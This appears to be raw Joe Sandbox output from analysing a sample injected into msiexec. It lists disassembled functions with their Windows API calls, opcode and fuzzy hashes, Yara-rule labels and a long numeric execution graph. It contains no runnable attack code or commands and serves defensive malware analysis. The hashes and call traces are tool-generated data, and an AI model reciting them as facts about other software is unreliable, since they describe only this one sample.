                                                                                                                                                • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 231171946-0
                                                                                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                • free.MSVCRT ref: 0040B12C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3669619086-0
                                                                                                                                                • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                • free.MSVCRT ref: 00417425
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1961120804-0
                                                                                                                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:2.1%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:0.5%
                                                                                                                                                Total number of Nodes:761
                                                                                                                                                Total number of Limit Nodes:20
                                                                                                                                                execution_graph 33689 40fc40 70 API calls 33864 403640 21 API calls 33690 427fa4 42 API calls 33865 412e43 _endthreadex 33866 425115 76 API calls __fprintf_l 33867 43fe40 133 API calls 33693 425115 83 API calls __fprintf_l 33694 401445 memcpy memcpy DialogBoxParamA 33695 440c40 34 API calls 32910 444c4a 32929 444e38 32910->32929 32912 444c56 GetModuleHandleA 32913 444c68 __set_app_type __p__fmode __p__commode 32912->32913 32915 444cfa 32913->32915 32916 444d02 __setusermatherr 32915->32916 32917 444d0e 32915->32917 32916->32917 32930 444e22 _controlfp 32917->32930 32919 444d13 _initterm __getmainargs _initterm 32920 444d6a GetStartupInfoA 32919->32920 32922 444d9e GetModuleHandleA 32920->32922 32931 40cf44 32922->32931 32926 444dcf _cexit 32928 444e04 32926->32928 32927 444dc8 exit 32927->32926 32929->32912 32930->32919 32982 404a99 LoadLibraryA 32931->32982 32933 40cf60 32934 40cf64 32933->32934 32990 410d0e 32933->32990 32934->32926 32934->32927 32936 40cf6f 32994 40ccd7 ??2@YAPAXI 32936->32994 32938 40cf9b 33008 407cbc 32938->33008 32943 40cfc4 33027 409825 memset 32943->33027 32944 40cfd8 33032 4096f4 memset 32944->33032 32949 40d181 ??3@YAXPAX 32952 40d1b3 32949->32952 32953 40d19f DeleteObject 32949->32953 32950 407e30 _strcmpi 32951 40cfee 32950->32951 32954 40cff2 RegDeleteKeyA 32951->32954 32955 40d007 EnumResourceTypesA 32951->32955 33056 407948 free free 32952->33056 32953->32952 32954->32949 32957 40d047 32955->32957 32958 40d02f MessageBoxA 32955->32958 32961 40d0a0 CoInitialize 32957->32961 33037 40ce70 32957->33037 32958->32949 32959 40d1c4 33057 4080d4 free 32959->33057 33054 40cc26 strncat memset RegisterClassA CreateWindowExA 32961->33054 32962 40d1cd 33058 407948 free free 32962->33058 32967 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33055 40c256 PostMessageA 32967->33055 32968 40d061 ??3@YAXPAX 32968->32952 32972 40d084 DeleteObject 32968->32972 32969 40d09e 32969->32961 32972->32952 32974 40d0f9 GetMessageA 32975 40d17b CoUninitialize 32974->32975 32976 40d10d 32974->32976 32975->32949 32977 40d113 TranslateAccelerator 32976->32977 32979 40d145 IsDialogMessage 32976->32979 32980 40d139 IsDialogMessage 32976->32980 32977->32976 32978 40d16d GetMessageA 32977->32978 32978->32975 32978->32977 32979->32978 32981 40d157 TranslateMessage DispatchMessageA 32979->32981 32980->32978 32980->32979 32981->32978 32983 404ac4 GetProcAddress 32982->32983 32984 404aec 32982->32984 32985 404ad4 32983->32985 32986 404add FreeLibrary 32983->32986 32988 404b13 32984->32988 32989 404afc MessageBoxA 32984->32989 32985->32986 32986->32984 32987 404ae8 32986->32987 32987->32984 32988->32933 32989->32933 32991 410d17 LoadLibraryA 32990->32991 32992 410d3c 32990->32992 32991->32992 32993 410d2b GetProcAddress 32991->32993 32992->32936 32993->32992 32995 40cd08 ??2@YAPAXI 32994->32995 32997 40cd26 32995->32997 32998 40cd2d 32995->32998 33066 404025 6 API calls 32997->33066 33000 40cd66 32998->33000 33001 40cd59 DeleteObject 32998->33001 33059 407088 33000->33059 33001->33000 33003 40cd6b 33062 4019b5 33003->33062 33006 4019b5 strncat 33007 40cdbf _mbscpy 33006->33007 33007->32938 33068 407948 free free 33008->33068 33011 407cf7 33013 407a1f malloc memcpy free free 33011->33013 33014 407ddc 33011->33014 33015 407d83 33011->33015 33016 407d7a free 33011->33016 33022 407e04 33011->33022 33072 40796e 7 API calls 33011->33072 33013->33011 33014->33022 33074 407a1f 33014->33074 33015->33011 33073 406f30 malloc memcpy free 33015->33073 33016->33011 33069 407a55 33022->33069 33023 407e30 33024 407e38 33023->33024 33025 407e57 33023->33025 33024->33025 33026 407e41 _strcmpi 33024->33026 33025->32943 33025->32944 33026->33024 33026->33025 33082 4097ff 33027->33082 33029 409854 33087 409731 33029->33087 33033 4097ff 3 API calls 33032->33033 33034 409723 33033->33034 33107 40966c 33034->33107 33121 4023b2 33037->33121 33043 40ced3 33205 40cdda 7 API calls 33043->33205 33044 40cece 33047 40cf3f 33044->33047 33158 40c3d0 memset GetModuleFileNameA strrchr 33044->33158 33047->32968 33047->32969 33050 40ceed 33184 40affa 33050->33184 33054->32967 33055->32974 33056->32959 33057->32962 33058->32934 33067 406fc7 memset _mbscpy 33059->33067 33061 40709f CreateFontIndirectA 33061->33003 33063 4019e1 33062->33063 33064 4019c2 strncat 33063->33064 33065 4019e5 memset LoadIconA 33063->33065 33064->33063 33065->33006 33066->32998 33067->33061 33068->33011 33070 407a65 33069->33070 33071 407a5b free 33069->33071 33070->33023 33071->33070 33072->33011 33073->33015 33075 407a38 33074->33075 33076 407a2d free 33074->33076 33081 406f30 malloc memcpy free 33075->33081 33077 407a44 33076->33077 33080 40796e 7 API calls 33077->33080 33079 407a43 33079->33077 33080->33022 33081->33079 33098 406f96 GetModuleFileNameA 33082->33098 33084 409805 strrchr 33085 409814 33084->33085 33086 409817 _mbscat 33084->33086 33085->33086 33086->33029 33099 44b090 33087->33099 33092 40930c 3 API calls 33093 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33092->33093 33094 4097c5 LoadStringA 33093->33094 33097 4097db 33094->33097 33096 4097f3 33096->32949 33097->33094 33097->33096 33106 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33097->33106 33098->33084 33100 40973e _mbscpy _mbscpy 33099->33100 33101 40930c 33100->33101 33102 44b090 33101->33102 33103 409319 memset GetPrivateProfileStringA 33102->33103 33104 409374 33103->33104 33105 409364 WritePrivateProfileStringA 33103->33105 33104->33092 33105->33104 33106->33097 33117 406f81 GetFileAttributesA 33107->33117 33109 409675 33110 4096ee 33109->33110 33111 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33109->33111 33110->32950 33118 409278 GetPrivateProfileStringA 33111->33118 33113 4096c9 33119 409278 GetPrivateProfileStringA 33113->33119 33115 4096da 33120 409278 GetPrivateProfileStringA 33115->33120 33117->33109 33118->33113 33119->33115 33120->33110 33207 409c1c 33121->33207 33124 401e69 memset 33246 410dbb 33124->33246 33127 401ec2 33270 4070e3 strlen _mbscat _mbscpy _mbscat 33127->33270 33128 401ed4 33259 406f81 GetFileAttributesA 33128->33259 33131 401ee6 strlen strlen 33133 401f15 33131->33133 33134 401f28 33131->33134 33271 4070e3 strlen _mbscat _mbscpy _mbscat 33133->33271 33260 406f81 GetFileAttributesA 33134->33260 33137 401f35 33261 401c31 33137->33261 33140 401f75 33142 402165 33140->33142 33143 401f9c memset 33140->33143 33141 401c31 5 API calls 33141->33140 33144 402195 ExpandEnvironmentStringsA 33142->33144 33145 4021a8 _strcmpi 33142->33145 33272 410b62 RegEnumKeyExA 33143->33272 33278 406f81 GetFileAttributesA 33144->33278 33145->33043 33145->33044 33148 401fd9 atoi 33149 401fef memset memset sprintf 33148->33149 33156 401fc9 33148->33156 33273 410b1e 33149->33273 33152 406f81 GetFileAttributesA 33152->33156 33153 402076 memset memset strlen strlen 33153->33156 33154 4070e3 strlen _mbscat _mbscpy _mbscat 33154->33156 33155 4020dd strlen strlen 33155->33156 33156->33142 33156->33148 33156->33152 33156->33153 33156->33154 33156->33155 33157 402167 _mbscpy 33156->33157 33277 410b62 RegEnumKeyExA 33156->33277 33157->33142 33159 40c422 33158->33159 33160 40c425 _mbscat _mbscpy _mbscpy 33158->33160 33159->33160 33161 40c49d 33160->33161 33162 40c512 33161->33162 33163 40c502 GetWindowPlacement 33161->33163 33164 40c538 33162->33164 33296 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33162->33296 33163->33162 33289 409b31 33164->33289 33168 40ba28 33169 40ba87 33168->33169 33175 40ba3c 33168->33175 33299 406c62 LoadCursorA SetCursor 33169->33299 33171 40ba8c 33300 403c16 33171->33300 33366 4107f1 33171->33366 33369 404734 33171->33369 33377 404785 33171->33377 33172 40ba43 _mbsicmp 33172->33175 33173 40baa0 33174 407e30 _strcmpi 33173->33174 33178 40bab0 33174->33178 33175->33169 33175->33172 33380 40b5e5 10 API calls 33175->33380 33176 40bafa SetCursor 33176->33050 33178->33176 33179 40baf1 qsort 33178->33179 33179->33176 33673 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33184->33673 33186 40b00e 33187 40b016 33186->33187 33188 40b01f GetStdHandle 33186->33188 33674 406d1a CreateFileA 33187->33674 33190 40b01c 33188->33190 33191 40b035 33190->33191 33192 40b12d 33190->33192 33675 406c62 LoadCursorA SetCursor 33191->33675 33679 406d77 9 API calls 33192->33679 33195 40b136 33206 40c580 28 API calls 33195->33206 33196 40b087 33203 40b0a1 33196->33203 33677 40a699 12 API calls 33196->33677 33197 40b042 33197->33196 33197->33203 33676 40a57c strlen WriteFile 33197->33676 33200 40b0d6 33201 40b116 CloseHandle 33200->33201 33202 40b11f SetCursor 33200->33202 33201->33202 33202->33195 33203->33200 33678 406d77 9 API calls 33203->33678 33205->33044 33206->33047 33219 409a32 33207->33219 33210 409c80 memcpy memcpy 33211 409cda 33210->33211 33211->33210 33212 409d18 ??2@YAPAXI ??2@YAPAXI 33211->33212 33213 408db6 12 API calls 33211->33213 33215 409d54 ??2@YAPAXI 33212->33215 33216 409d8b 33212->33216 33213->33211 33215->33216 33229 409b9c 33216->33229 33218 4023c1 33218->33124 33220 409a44 33219->33220 33221 409a3d ??3@YAXPAX 33219->33221 33222 409a52 33220->33222 33223 409a4b ??3@YAXPAX 33220->33223 33221->33220 33224 409a63 33222->33224 33225 409a5c ??3@YAXPAX 33222->33225 33223->33222 33226 409a83 ??2@YAPAXI ??2@YAPAXI 33224->33226 33227 409a73 ??3@YAXPAX 33224->33227 33228 409a7c ??3@YAXPAX 33224->33228 33225->33224 33226->33210 33227->33228 33228->33226 33230 407a55 free 33229->33230 33231 409ba5 33230->33231 33232 407a55 free 33231->33232 33233 409bad 33232->33233 33234 407a55 free 33233->33234 33235 409bb5 33234->33235 33236 407a55 free 33235->33236 33237 409bbd 33236->33237 33238 407a1f 4 API calls 33237->33238 33239 409bd0 33238->33239 33240 407a1f 4 API calls 33239->33240 33241 409bda 33240->33241 33242 407a1f 4 API calls 33241->33242 33243 409be4 33242->33243 33244 407a1f 4 API calls 33243->33244 33245 409bee 33244->33245 33245->33218 33247 410d0e 2 API calls 33246->33247 33248 410dca 33247->33248 33249 410dfd memset 33248->33249 33279 4070ae 33248->33279 33251 410e1d 33249->33251 33252 410e7f _mbscpy 33251->33252 33282 410d3d _mbscpy 33251->33282 33254 401e9e strlen strlen 33252->33254 33254->33127 33254->33128 33256 410e5b 33283 410add RegQueryValueExA 33256->33283 33258 410e73 33258->33252 33259->33131 33260->33137 33262 401c4c 33261->33262 33266 401ca1 33262->33266 33284 410add RegQueryValueExA 33262->33284 33264 401c6a 33265 401c71 strchr 33264->33265 33264->33266 33265->33266 33267 401c85 strchr 33265->33267 33266->33140 33266->33141 33267->33266 33268 401c94 33267->33268 33285 406f06 strlen 33268->33285 33270->33128 33271->33134 33272->33156 33274 410b34 33273->33274 33275 410b4c 33274->33275 33288 410add RegQueryValueExA 33274->33288 33275->33156 33277->33156 33278->33145 33280 4070bd GetVersionExA 33279->33280 33281 4070ce 33279->33281 33280->33281 33281->33249 33281->33254 33282->33256 33283->33258 33284->33264 33286 406f17 33285->33286 33287 406f1a memcpy 33285->33287 33286->33287 33287->33266 33288->33275 33290 409b40 33289->33290 33292 409b4e 33289->33292 33297 409901 memset SendMessageA 33290->33297 33293 409b99 33292->33293 33294 409b8b 33292->33294 33293->33168 33298 409868 SendMessageA 33294->33298 33296->33164 33297->33292 33298->33293 33299->33171 33301 4107f1 FreeLibrary 33300->33301 33302 403c30 LoadLibraryA 33301->33302 33303 403c74 33302->33303 33304 403c44 GetProcAddress 33302->33304 33306 4107f1 FreeLibrary 33303->33306 33304->33303 33305 403c5e 33304->33305 33305->33303 33309 403c6b 33305->33309 33307 403c7b 33306->33307 33308 404734 3 API calls 33307->33308 33310 403c86 33308->33310 33309->33307 33381 4036e5 33310->33381 33313 4036e5 27 API calls 33314 403c9a 33313->33314 33315 4036e5 27 API calls 33314->33315 33316 403ca4 33315->33316 33317 4036e5 27 API calls 33316->33317 33318 403cae 33317->33318 33393 4085d2 33318->33393 33324 403cd2 33326 403cf7 33324->33326 33545 402bd1 37 API calls 33324->33545 33327 403d1c 33326->33327 33546 402bd1 37 API calls 33326->33546 33428 402c5d 33327->33428 33331 4070ae GetVersionExA 33332 403d31 33331->33332 33334 403d61 33332->33334 33547 402b22 42 API calls 33332->33547 33336 403d97 33334->33336 33548 402b22 42 API calls 33334->33548 33337 403dcd 33336->33337 33549 402b22 42 API calls 33336->33549 33440 410808 33337->33440 33341 404785 FreeLibrary 33342 403de8 33341->33342 33444 402fdb 33342->33444 33345 402fdb 29 API calls 33346 403e00 33345->33346 33456 4032b7 33346->33456 33355 403e3b 33357 403e73 33355->33357 33358 403e46 _mbscpy 33355->33358 33503 40fb00 33357->33503 33551 40f334 333 API calls 33358->33551 33367 410807 33366->33367 33368 4107fc FreeLibrary 33366->33368 33367->33173 33368->33367 33370 404785 FreeLibrary 33369->33370 33371 40473b LoadLibraryA 33370->33371 33372 40474c GetProcAddress 33371->33372 33373 40476e 33371->33373 33372->33373 33374 404764 33372->33374 33375 404781 33373->33375 33376 404785 FreeLibrary 33373->33376 33374->33373 33375->33173 33376->33375 33378 4047a3 33377->33378 33379 404799 FreeLibrary 33377->33379 33378->33173 33379->33378 33380->33175 33382 4037c5 33381->33382 33383 4036fb 33381->33383 33382->33313 33552 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33383->33552 33385 40370e 33385->33382 33386 403716 strchr 33385->33386 33386->33382 33387 403730 33386->33387 33553 4021b6 memset 33387->33553 33389 40373f _mbscpy _mbscpy strlen 33390 4037a4 _mbscpy 33389->33390 33391 403789 sprintf 33389->33391 33554 4023e5 16 API calls 33390->33554 33391->33390 33394 4085e2 33393->33394 33555 4082cd 11 API calls 33394->33555 33396 4085ec 33397 403cba 33396->33397 33398 40860b memset 33396->33398 33405 40821d 33397->33405 33557 410b62 RegEnumKeyExA 33398->33557 33400 408637 33400->33397 33401 40865c memset 33400->33401 33559 40848b 10 API calls 33400->33559 33560 410b62 RegEnumKeyExA 33400->33560 33558 410add RegQueryValueExA 33401->33558 33406 40823f 33405->33406 33407 403cc6 33406->33407 33408 408246 memset 33406->33408 33413 4086e0 33407->33413 33561 410b62 RegEnumKeyExA 33408->33561 33412 40826f 33412->33407 33562 4080ed 11 API calls 33412->33562 33563 410b62 RegEnumKeyExA 33412->33563 33564 4045db 33413->33564 33415 4088ef 33572 404656 33415->33572 33419 408737 wcslen 33419->33415 33420 40876a 33419->33420 33420->33415 33421 40877a wcsncmp 33420->33421 33423 404734 3 API calls 33420->33423 33424 404785 FreeLibrary 33420->33424 33425 408812 memset 33420->33425 33426 40883c memcpy wcschr 33420->33426 33427 4088c3 LocalFree 33420->33427 33575 40466b _mbscpy 33420->33575 33421->33420 33423->33420 33424->33420 33425->33420 33425->33426 33426->33420 33427->33420 33429 402c7a 33428->33429 33430 402c87 memset 33429->33430 33439 402d9a 33429->33439 33576 410b62 RegEnumKeyExA 33430->33576 33432 410b1e RegQueryValueExA 33433 402ce4 memset sprintf 33432->33433 33436 402cb2 33433->33436 33434 402d3a sprintf 33434->33436 33436->33432 33436->33434 33436->33439 33577 402bd1 37 API calls 33436->33577 33578 402bd1 37 API calls 33436->33578 33579 410b62 RegEnumKeyExA 33436->33579 33439->33331 33441 410816 33440->33441 33442 4107f1 FreeLibrary 33441->33442 33443 403ddd 33442->33443 33443->33341 33445 402ff9 33444->33445 33446 403006 memset 33445->33446 33447 403122 33445->33447 33580 410b62 RegEnumKeyExA 33446->33580 33447->33345 33449 403033 33449->33447 33450 410b1e RegQueryValueExA 33449->33450 33452 4030a2 memset 33449->33452 33453 410b62 RegEnumKeyExA 33449->33453 33582 402db3 24 API calls 33449->33582 33451 403058 memset sprintf 33450->33451 33451->33449 33581 410b62 RegEnumKeyExA 33452->33581 33453->33449 33457 4032d5 33456->33457 33458 4033a9 33456->33458 33583 4021b6 memset 33457->33583 33471 4034e4 memset memset 33458->33471 33460 4032e1 33584 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33460->33584 33462 4032ea 33463 4032f8 memset GetPrivateProfileSectionA 33462->33463 33585 4023e5 16 API calls 33462->33585 33463->33458 33468 40332f 33463->33468 33465 40339b strlen 33465->33458 33465->33468 33467 403350 strchr 33467->33468 33468->33458 33468->33465 33586 4021b6 memset 33468->33586 33587 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33468->33587 33588 4023e5 16 API calls 33468->33588 33472 410b1e RegQueryValueExA 33471->33472 33473 40353f 33472->33473 33474 40357f 33473->33474 33475 403546 _mbscpy 33473->33475 33479 403985 33474->33479 33589 406d55 strlen _mbscat 33475->33589 33477 403565 _mbscat 33590 4033f0 19 API calls 33477->33590 33591 40466b _mbscpy 33479->33591 33483 4039aa 33485 4039ff 33483->33485 33592 40f6e2 33483->33592 33608 40f460 12 API calls 33483->33608 33609 4038e8 21 API calls 33483->33609 33486 404785 FreeLibrary 33485->33486 33487 403a0b 33486->33487 33488 4037ca memset memset 33487->33488 33611 444551 memset 33488->33611 33491 4038e2 33491->33355 33550 40f334 333 API calls 33491->33550 33493 40382e 33494 406f06 2 API calls 33493->33494 33495 403843 33494->33495 33496 406f06 2 API calls 33495->33496 33497 403855 strchr 33496->33497 33498 403884 _mbscpy 33497->33498 33499 403897 strlen 33497->33499 33500 4038bf _mbscpy 33498->33500 33499->33500 33501 4038a4 sprintf 33499->33501 33620 4023e5 16 API calls 33500->33620 33501->33500 33505 40fb10 33503->33505 33504 403e7f 33513 40f96c 33504->33513 33505->33504 33506 40fb55 RegQueryValueExA 33505->33506 33506->33504 33507 40fb84 33506->33507 33508 404734 3 API calls 33507->33508 33509 40fb91 33508->33509 33509->33504 33510 40fc19 LocalFree 33509->33510 33511 40fbdd memcpy memcpy 33509->33511 33510->33504 33624 40f802 7 API calls 33511->33624 33514 4070ae GetVersionExA 33513->33514 33515 40f98d 33514->33515 33516 4045db 7 API calls 33515->33516 33517 40f9a9 33516->33517 33520 40fae6 33517->33520 33521 40fa13 memset WideCharToMultiByte 33517->33521 33518 404656 FreeLibrary 33519 403e85 33518->33519 33525 4442ea memset 33519->33525 33520->33518 33521->33517 33522 40fa43 _strnicmp 33521->33522 33522->33517 33523 40fa5b WideCharToMultiByte 33522->33523 33523->33517 33524 40fa88 WideCharToMultiByte 33523->33524 33524->33517 33526 410dbb 7 API calls 33525->33526 33527 444329 33526->33527 33625 40759e strlen strlen 33527->33625 33532 410dbb 7 API calls 33533 444350 33532->33533 33534 40759e 3 API calls 33533->33534 33535 44435a 33534->33535 33536 444212 64 API calls 33535->33536 33537 444366 memset memset 33536->33537 33538 410b1e RegQueryValueExA 33537->33538 33539 4443b9 ExpandEnvironmentStringsA strlen 33538->33539 33540 4443f4 _strcmpi 33539->33540 33541 4443e5 33539->33541 33542 403e91 33540->33542 33543 44440c 33540->33543 33541->33540 33542->33173 33544 444212 64 API calls 33543->33544 33544->33542 33545->33326 33546->33327 33547->33334 33548->33336 33549->33337 33550->33355 33551->33357 33552->33385 33553->33389 33554->33382 33556 40841c 33555->33556 33556->33396 33557->33400 33558->33400 33559->33400 33560->33400 33561->33412 33562->33412 33563->33412 33565 404656 FreeLibrary 33564->33565 33566 4045e3 LoadLibraryA 33565->33566 33567 404651 33566->33567 33568 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33566->33568 33567->33415 33567->33419 33569 40463d 33568->33569 33570 404643 33569->33570 33571 404656 FreeLibrary 33569->33571 33570->33567 33571->33567 33573 404666 33572->33573 33574 40465c FreeLibrary 33572->33574 33573->33324 33574->33573 33575->33420 33576->33436 33577->33434 33578->33436 33579->33436 33580->33449 33581->33449 33582->33449 33583->33460 33584->33462 33585->33463 33586->33467 33587->33468 33588->33468 33589->33477 33590->33474 33591->33483 33610 40466b _mbscpy 33592->33610 33594 40f6fa 33595 4045db 7 API calls 33594->33595 33596 40f708 33595->33596 33597 404734 3 API calls 33596->33597 33602 40f7e2 33596->33602 33603 40f715 33597->33603 33598 404656 FreeLibrary 33599 40f7f1 33598->33599 33600 404785 FreeLibrary 33599->33600 33601 40f7fc 33600->33601 33601->33483 33602->33598 33603->33602 33604 40f797 WideCharToMultiByte 33603->33604 33605 40f7b8 strlen 33604->33605 33606 40f7d9 LocalFree 33604->33606 33605->33606 33607 40f7c8 _mbscpy 33605->33607 33606->33602 33607->33606 33608->33483 33609->33483 33610->33594 33612 44458b 33611->33612 33615 40381a 33612->33615 33621 410add 